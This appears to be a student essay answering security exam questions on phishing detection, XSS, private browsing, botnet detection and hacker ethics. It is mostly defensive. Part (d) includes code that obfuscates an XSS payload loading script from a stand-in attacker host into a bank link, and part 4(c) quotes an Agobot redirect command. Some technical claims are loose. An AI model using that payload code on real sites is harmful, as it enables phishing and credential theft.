Systems Much More Secure Computer Science Essay



This question is stolen from someone else's exam. Phishing web sites create a copy of a legitimate web site and present the user with an authentic-looking login page. When the user enters login credentials (username/password), the data is recorded and later collected by the phisher. The phisher can drive traffic to the phishing page using a number of techniques, including spam email and ads.

(a) Login pages are typically served over HTTPS using the site's certificate.

How can phishers who do not want to pay for a certificate get around this?

One way phishers get around this is to compromise a website which already has an SSL certificate and host the phishing page under that same domain. They usually go that far only when they strongly believe they are going to get much out of it.

Scammers often host phishing content on a compromised website and can thus take advantage of that site's certificate, though in some cases they may not realize that SSL is available and end up serving the content via plain HTTP. Certificates found on phishing sites rarely appear to have been issued specifically for the purpose of deception.

(b) Some phishers copy the login page as is. That is, they copy the login page, but leave the embedded image links pointing to the real banking site. Explain how a banking site can use this fact to detect phishing sites.

Attackers often design the phishing web page so that the images are fetched from the original location, rather than maintaining a repository of images on the fake web site. When a user loads the phishing page, the browser goes and fetches the images from the original site, and the Referer URL recorded there will be the fake bank site's URL rather than one of the original site's own pages. By analyzing the web server logs on the original site and looking for suspicious Referer values, the bank will be able to detect a phishing attack in progress. Note that an attacker can defeat this by saving the images locally instead of referring to them on the bank's website.
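The log analysis described above can be sketched in Python. This is a minimal illustration, assuming an Apache/nginx combined-format access log and a made-up bank domain (`examplebank.com`); a real deployment would match the bank's actual log format and hostnames.

```python
# Hypothetical sketch: scan a combined-format access log for image requests
# whose Referer header points at a site other than the bank's own pages.
# The bank hostnames below are illustrative assumptions.
import re
from urllib.parse import urlparse

BANK_HOSTS = {"www.examplebank.com", "examplebank.com"}  # assumed legitimate hosts

# Matches: quoted request line, then status, size, and the quoted Referer field.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) [^"]*" \d+ \S+ "(?P<referer>[^"]*)"')

def suspicious_referers(log_lines):
    """Yield (image_path, referer_host) for images hot-linked by foreign pages."""
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path, referer = m.group("path"), m.group("referer")
        if not path.endswith((".png", ".gif", ".jpg", ".jpeg")):
            continue  # only image fetches are interesting here
        host = urlparse(referer).netloc
        if host and host not in BANK_HOSTS:
            yield path, host  # image embedded by a possible phishing page
```

Any host that repeatedly appears here while embedding the bank's login-page images is a strong phishing candidate.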

Another method applies when the phisher has copied the HTML code and images from the bank's website. To do so, the phisher must have visited the authentic site before building the fake one. By encoding the visitor's IP address and a timestamp as part of the served HTML code, the bank can later find out whether its code was copied, and when and by whom. There are numerous ways to achieve this: extra whitespace between HTML tags, additional GET parameters, or watermarked images. The most appropriate method will depend on the site's web infrastructure.
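One of the watermarking options mentioned, an extra GET parameter, could look like the following sketch. The parameter name `v` and the plain hex encoding are illustrative assumptions; a real site would encrypt or HMAC the token so the phisher cannot read or strip it.

```python
# Hypothetical sketch: encode the requesting IP and a timestamp as a hex
# string and embed it as an extra GET parameter on an image URL, so a copied
# page reveals who fetched the original and when.
import binascii
import time

def make_watermark(client_ip, ts):
    """Hex-encode "ip|timestamp" so it looks like an opaque cache-buster token."""
    return binascii.hexlify(f"{client_ip}|{ts}".encode()).decode()

def read_watermark(token):
    """Recover who fetched the page, and when, from a copied HTML snippet."""
    ip, ts = binascii.unhexlify(token).decode().split("|")
    return ip, int(ts)

def watermarked_img_tag(client_ip):
    token = make_watermark(client_ip, int(time.time()))
    # The "v" parameter is ignored by the image handler but survives copying.
    return f'<img src="/img/logo.png?v={token}" alt="logo">'
```

If that token later turns up in a phishing page's HTML, the bank can decode it and see which visit produced the copy.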

(c) Some phishers may make a complete copy of the phished site, duplicating all images and scripts on the target page and store them on the phishing server.

They copy Javascript on the phished page, but without altering the script. Explain how a bank can use this fact to not only detect phishing sites, but also detect which of its customers fell victim to the phishing scam. The bank can then move to block those customers' accounts.

A simple detection method is to embed something like obfuscated JavaScript in the original site's page that alerts the bank if the page is running under any address other than the original one. Because the phisher copies the script without altering it, the same script runs on the phishing site; it can also send back the username entered on the fake page, so the bank learns exactly which customers fell victim and can block those accounts.

(d) Suppose the banking login page has an XSS vulnerability. Explain how this can make the phisher's life easier.

An attacker can mount a cross-site scripting attack through the XSS vulnerability: the attacker generates links to the real banking web site which, when clicked, deliver active content that appears to originate from the bank itself. The malicious part of the link can be hex-encoded, with obfuscating padding, so it is not obvious on inspection; the browser or server decodes it back into live script. This causes the browser to not only download a JavaScript script from the attacker's site, but also to process it in the context of the bank's web application, due to the web application's failure to properly escape quote characters and HTML tags. The phisher's life is easier because the victim is on the real site, with the real domain and certificate, so no convincing fake site is needed at all.
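To illustrate the hex-encoded obfuscation, here is a hedged sketch of how such a reflected-XSS link could be percent-encoded. The domain names and the vulnerable `msg` parameter are invented for illustration only.

```python
# Illustrative sketch: percent (hex) encode an injected script so the URL
# shows only %XX escapes for the telltale characters. All names here are
# invented; this only demonstrates the encoding idea.
from urllib.parse import quote, unquote

payload = '<script src="http://attacker.example/steal.js"></script>'
# Encode every reserved character, so "<script" becomes "%3Cscript", etc.
obfuscated = quote(payload, safe="")
link = f"https://bank.example/login?msg={obfuscated}"

# The browser (or the vulnerable server) decodes it back into live markup:
decoded = unquote(obfuscated)
```

The decoded value equals the original payload, which the unescaped page then renders as script in the bank's own context.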

3. Your friend thinks he's a security expert (though he hasn't been to TAFE) and claims that the best way to protect your data when using the Internet at home is to use the "private" or "incognito" mode in Firefox or Chrome for sensitive transactions. What security benefits does such an action provide? Is this really a valid way to protect your information? If it isn't, how would you take this guy down?


The only good feature of private browsing is that visited pages are not saved: no sites are added to the history menu or the address bar's suggestion list, no new passwords are saved, and nothing you enter in a search bar or a form is kept by auto-save. You will not find any download history either. Cookies store only limited, session-scoped information about websites, such as login status.

Disadvantages:

While private browsing is useful, it is not effective at saving you from attacks such as keylogging (which captures your usernames and passwords as you type), theft of browser cache data to obtain your sensitive information (with which an attacker can also lift Wi-Fi usernames and passwords), virus attacks after your info, and tracking programs. It also does nothing to hide your traffic from the network itself, so on its own it is not a valid way to protect your information.

4. (This question is stolen from someone else's exam). A bot is remotely controlled software, executing on a compromised host. A botnet is a network of bots and a controller that controls their operation. Most bots are highly programmable, allowing the bot controller to send programs that are executed by bots. Bot detection and remediation can be carried out on a network by examining network traffic, or on a host by trying to identify software that is acting as a bot.

(a) Bots are widely used for relaying email spam. Describe a network defense that detects bots used for spam.

A spam-filtering service is a basic and effective way to detect spam-email bots. Run together with antivirus, it automatically removes spam, viruses, and other email-borne threats via the cloud, and it also prevents unwanted spam and blocks email viruses. On the network side, a defender can additionally watch for internal hosts that suddenly open large numbers of outbound SMTP connections, which is characteristic of a host relaying spam.
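A network-side heuristic along these lines, flagging internal hosts that open unusually many outbound SMTP (port 25) connections, can be sketched as follows. The flow-record format and the threshold are illustrative assumptions, not tuned values.

```python
# Hedged sketch: count outbound SMTP connections per internal source host
# over one observation window; a spam bot relays mail far faster than a
# normal workstation. Flow records and threshold are assumptions.
from collections import Counter

SMTP_PORT = 25
THRESHOLD = 100  # outbound SMTP connections per window (illustrative)

def spam_bot_suspects(flows):
    """flows: iterable of (src_ip, dst_ip, dst_port) tuples for one window."""
    counts = Counter(src for src, _dst, port in flows if port == SMTP_PORT)
    return [ip for ip, n in counts.items() if n >= THRESHOLD]
```

A real deployment would feed this from NetFlow or firewall logs and whitelist the organization's legitimate mail servers.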

(b) Bots have been used for launching distributed denial of service (DDoS) attacks. Describe a network defense that detects bots carrying out a DDoS attack. Use some characteristic of the way DDoS attacks are usually done other than measuring the amount of network traffic coming from a host on the network.

We can neutralize the botnet's handlers (there are usually few DDoS handlers deployed compared to the number of agents); neutralizing a few handlers can render many agents useless, thus thwarting the DDoS attack.

Through Snort as an IDS/IPS, rules can be set to match potential DDoS attacks on the network, using Snort's signature ID (SID) as a mechanism to perform packet logging. Other techniques include activity logging, change-point detection (establishing what is normal and flagging what is abnormal), and wavelet analysis of the traffic signal.

We can also use Wireshark to capture the network's packets; packets highlighted in red can point to a DDoS against the server. DDoS attacks are often SYN floods coming from all over the globe, and their telltale characteristic, independent of raw traffic volume, is a large number of TCP handshakes that begin with a SYN but are never completed.
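The SYN-flood characteristic, handshakes opened but never completed, can be sketched as a simple per-source counter. The packet records here are simplified tuples; a real tool would take these fields from a libpcap/Wireshark capture, and the threshold is an illustrative assumption.

```python
# Minimal sketch: count, per source address, TCP handshakes that start with
# a SYN but are never completed with the client's final ACK. Sources with
# many half-open handshakes look like SYN-flood participants.
def half_open_sources(packets, threshold=50):
    """packets: iterable of (src_ip, flags) where flags is e.g. "SYN" or "ACK"."""
    pending = {}  # src_ip -> count of SYNs not yet matched by an ACK
    for src, flags in packets:
        if flags == "SYN":
            pending[src] = pending.get(src, 0) + 1
        elif flags == "ACK" and pending.get(src, 0) > 0:
            pending[src] -= 1  # handshake completed normally
    return {src: n for src, n in pending.items() if n >= threshold}
```

Note this deliberately measures handshake completion, not traffic volume, as the question asks.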

There is another way of detecting DDoS attacks that comes from the Common Intrusion Detection Framework: A-boxes, network activity analysis devices that can be specific hardware, software, or both. They gather information and look for defined patterns, such as the consistent stream of packets produced by trojans or viruses. An A-box is great for detecting DDoS attacks and router attacks.

Detect and Stop Malicious Requests - Because application DDoS attacks mimic regular Web application traffic, they can be difficult to detect through typical network DDoS techniques. However, using a combination of application-level controls and anomaly detection, organizations can identify and stop malicious traffic. Measures include:

Detect an excessive number of requests from a single source or user session - Automated attack sources almost always request Web pages more rapidly than standard users.

Prevent known network and application DDoS attacks - Many types of DDoS attacks rely on simple network techniques like fragmented packets, spoofing, or not completing TCP handshakes. More advanced attacks, typically application-level attacks, attempt to overwhelm server resources. These attacks can be detected through unusual user activity and known application attack signatures.

Distinguish the attributes, and the aftermath, of a malicious request - Some DDoS attacks can be detected through known attack patterns or signatures. In addition, many malicious Web requests do not conform to HTTP protocol standards. For instance, the Slowloris DDoS attack included redundant HTTP headers. DDoS clients may also request Web pages that do not exist, generate Web server errors, or slow Web server response time.
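The first measure above, spotting an excessive number of requests from a single source, can be sketched as a sliding-window rate detector. The window length and request limit are illustrative assumptions, not tuned values.

```python
# Hedged sketch: flag sources whose request rate exceeds what a human user
# plausibly generates. Timestamps are seconds; window/limit are assumptions.
from collections import defaultdict, deque

class RateDetector:
    def __init__(self, window_secs=10, max_requests=50):
        self.window = window_secs
        self.limit = max_requests
        self.history = defaultdict(deque)  # src_ip -> recent request times

    def request(self, src_ip, now):
        """Record one request; return True if this source now looks automated."""
        q = self.history[src_ip]
        q.append(now)
        while q and q[0] <= now - self.window:
            q.popleft()  # drop requests that fell outside the sliding window
        return len(q) > self.limit
```

Flagged sources can then be rate-limited or challenged rather than blocked outright, since legitimate proxies can also aggregate many users.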

(c) One possible way to do host-based bot detection is to compare contents of network packets that might be commands from the controller with system calls on the host. Explain how this idea might help you detect a bot executing a port redirect command (i.e. receive input on one port and send it back out on another).

Using libpcap, we can capture the network traffic and filter it for the string "redirect" to find command packets from the controller in the captured traffic. Matching such a command against system-call activity on the host (a process that binds a listening socket on the first port and opens an outgoing connection on the second) confirms that a bot is executing the port redirect.

For example the agobot which uses the following executable commands:

<Ago> .redirect.tcp 2352 80

<Agobot3> redirtcp: redirecting from port 2352 to "".

Therefore, applying a filter that searches for "redirect" would surface this type of packet, which could then be used to identify bot activity within the host machine.
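A hedged sketch of such a filter over captured payloads, using the Agobot command format shown above (the capture source and payload framing are assumptions; a real tool would read packets via libpcap):

```python
# Hypothetical sketch: scan captured packet payloads for bot-controller
# redirect commands like Agobot's ".redirect.tcp <listen> <target>".
import re

# Matches e.g. b".redirect.tcp 2352 80" and captures the two ports involved.
REDIRECT_RE = re.compile(rb"\.redirect\.tcp\s+(\d+)\s+(\d+)")

def find_redirect_commands(payloads):
    """Return (listen_port, target_port) pairs seen in any payload."""
    hits = []
    for data in payloads:
        m = REDIRECT_RE.search(data)
        if m:
            hits.append((int(m.group(1)), int(m.group(2))))
    return hits
```

A host-based detector would then check whether some process has actually bound the listen port and is connecting out on the target port, correlating the network command with system calls as the question suggests.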

5. From


The idea of a "hacker ethic" is perhaps best formulated in Steven Levy's 1984 book, Hackers: Heroes of the Computer Revolution. Levy came up with six tenets:

1. Access to computers - and anything which might teach you something about the way the world works - should be unlimited and total. Always yield to the Hands-On imperative!

2. All information should be free.

3. Mistrust authority - promote decentralization.

4. Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, or position.

5. You can create art and beauty on a computer.

6. Computers can change your life for the better.



ibid, from Richard Stallman

"I don't know if there actually is a hacker's ethic as such, but there sure was an M.I.T. Artificial Intelligence Lab ethic. This was that bureaucracy should not be allowed to get in the way of doing anything useful. Rules did not matter - results mattered. Rules, in the form of computer security or locks on doors, were held in total, absolute disrespect. We would be proud of how quickly we would sweep away whatever little piece of bureaucracy was getting in the way, how little time it forced you to waste. Anyone who dared to lock a terminal in his office, say because he was a professor and thought he was more important than other people, would likely find his door left open the next morning. I would just climb over the ceiling or under the floor, move the terminal out, or leave the door open with a note saying what a big inconvenience it is to have to go under the floor, "so please do not inconvenience people by locking the door any longer." Even now, there is a big wrench at the AI Lab entitled "the seventh-floor master key", to be used in case anyone dares to lock up one of the more fancy terminals."


The types of people who are interested and passionate about hacking are the same types of people who are charged with the protection of the networks they seek to exploit. It's almost as if the inmates are taking over the asylum! Discuss how the hacker ethic can lead to the ethical hacker.

In terms of ethics, this is really about the grey-hat hacker: a person whose intentions are good but who has no permission to hack, so we cannot call him an ethical hacker. Hacking into a computer is not as simple as it is often portrayed; it is a long, time-consuming process, and hackers spend most of their time with computers rather than with their family and friends.

I will give you one example. In 2011 a man found a flaw in a superannuation website: while going through his own super fund, he changed some parameters in the URL, which led him to someone else's super details. For further testing he went through about 50 more accounts and downloaded their details as proof, including those of NSW police officers and magistrates, and then contacted the company to tell them about the vulnerability in their website. He was doing it as a good deed, but the super company disabled his account straight away and ended up sending police with a legal letter threatening legal action.

As Levy would put it, this person was acting as a hacker in the hope of improving the lives of the affected users by pointing out the potential flaws he had identified, but the authorities rejected this "art performed on the computer" that could have fixed the security flaws apparent in the case.

That experience led him to become an ethical hacker, in line with Levy's fourth tenet ("Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, or position"); he now runs his own company.

We also have the story of Kevin Mitnick and how he became an ethical hacker out of a black hat: it is about opportunity, second chances, and looking at the skills of a person.

Ethical hackers know the penalties that apply within their jurisdiction; hence all security auditing and penetration testing should be performed legally, on the basis of granted permission, since misuse can have severe consequences. Ethical hacking is therefore more than just running a set of tools against a system to determine what is exploitable within that network. As Levy stated, having access to computers enhances the learning experience and rewards the hands-on imperative, which may eventually change the world by producing better and more efficient security measures. Ethical hacking often takes place only once flaws are apparent, and as such it is relatively expensive; however, the community of people across the internet assisting each other and probing areas of vulnerability reflects the sharing ethos Levy described, similar to that shown at the MIT AI Lab.